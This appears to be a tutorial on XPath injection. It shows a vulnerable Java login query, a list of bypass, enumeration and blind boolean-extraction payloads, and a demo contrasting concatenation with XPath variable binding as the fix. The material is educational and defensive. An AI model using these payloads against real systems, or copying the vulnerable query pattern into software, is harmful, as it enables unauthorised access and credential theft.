XPath Injection is a vulnerability in which user input is incorporated into XPath queries without proper validation or parameterization, allowing an attacker to alter the query and read data from an XML document that the application never meant to expose.
XPath is a query language for selecting nodes from XML documents. When an application builds an XPath expression by concatenating unvalidated user input, the attacker can inject XPath syntax that changes the query's logic, in the same way SQL injection changes a SQL statement.
// Vulnerable XPath query construction: the raw username and password are
// concatenated into the expression, so they can change its structure
XPath xPath = XPathFactory.newInstance().newXPath();
String xpath = "//users/user[username='" + username + "' and password='" + password + "']";
NodeList result = (NodeList) xPath.evaluate(xpath, doc, XPathConstants.NODESET);
// XML data being queried:
<users>
  <user><username>admin</username><password>secret</password></user>
  <user><username>guest</username><password>guest123</password></user>
</users>
# Authentication bypass
Username: ' or '1'='1
Password: ' or '1'='1
Query becomes: //users/user[username='' or '1'='1' and password='' or '1'='1']
Because "and" binds tighter than "or", the predicate is true for every user node, so the check passes without valid credentials.
# Extract all users (blind injection)
Username: ' or '1'='1' or '
# Returns all user nodes
# Enumerate node structure
Username: '] | //user/* | //user['
# Boolean-based extraction
' or substring(//user[1]/password,1,1)='s' or '1'='2
# True if first char of password is 's'
# Count nodes
' or count(//user)>5 or '1'='2
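The concatenated query above and the same check rewritten with XPath variable binding, shown side by side as an added example (not code from the original page). It uses the page's sample document and the bypass payload from the "Authentication bypass" entry; the class name and method names are my own. For the payload, the vulnerable method matches both users while the bound version matches none, because the expression text is fixed and the input is only ever compared as a string value.

```java
import javax.xml.namespace.QName;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.*;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Map;

public class XPathInjectionDemo {
    // The sample document from the page, embedded inline as constructed test data.
    static final String XML =
        "<users>"
      + "<user><username>admin</username><password>secret</password></user>"
      + "<user><username>guest</username><password>guest123</password></user>"
      + "</users>";

    // Vulnerable: input is concatenated straight into the expression text.
    static int loginVulnerable(Document doc, String username, String password)
            throws XPathExpressionException {
        XPath xp = XPathFactory.newInstance().newXPath();
        String expr = "//users/user[username='" + username + "' and password='" + password + "']";
        NodeList hits = (NodeList) xp.evaluate(expr, doc, XPathConstants.NODESET);
        return hits.getLength();
    }

    // Hardened: values are bound as XPath variables through an XPathVariableResolver,
    // so the expression is compiled once and the input cannot change its structure.
    static int loginSafe(Document doc, String username, String password)
            throws XPathExpressionException {
        XPath xp = XPathFactory.newInstance().newXPath();
        Map<String, String> vars = Map.of("username", username, "password", password);
        xp.setXPathVariableResolver((QName name) -> vars.get(name.getLocalPart()));
        XPathExpression compiled = xp.compile("//users/user[username=$username and password=$password]");
        NodeList hits = (NodeList) compiled.evaluate(doc, XPathConstants.NODESET);
        return hits.getLength();
    }

    public static void main(String[] args) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
            .parse(new ByteArrayInputStream(XML.getBytes(StandardCharsets.UTF_8)));
        String injected = "' or '1'='1";   // the bypass payload from the page
        System.out.println("vulnerable, valid creds: " + loginVulnerable(doc, "guest", "guest123"));
        System.out.println("vulnerable, injected:    " + loginVulnerable(doc, injected, injected));
        System.out.println("bound, valid creds:      " + loginSafe(doc, "guest", "guest123"));
        System.out.println("bound, injected:         " + loginSafe(doc, injected, injected));
    }
}
```

Variable binding is the XPath counterpart of a prepared statement; input validation (for example rejecting quotes, brackets and the "|" union operator in usernames) is a useful second layer but should not be the only defence.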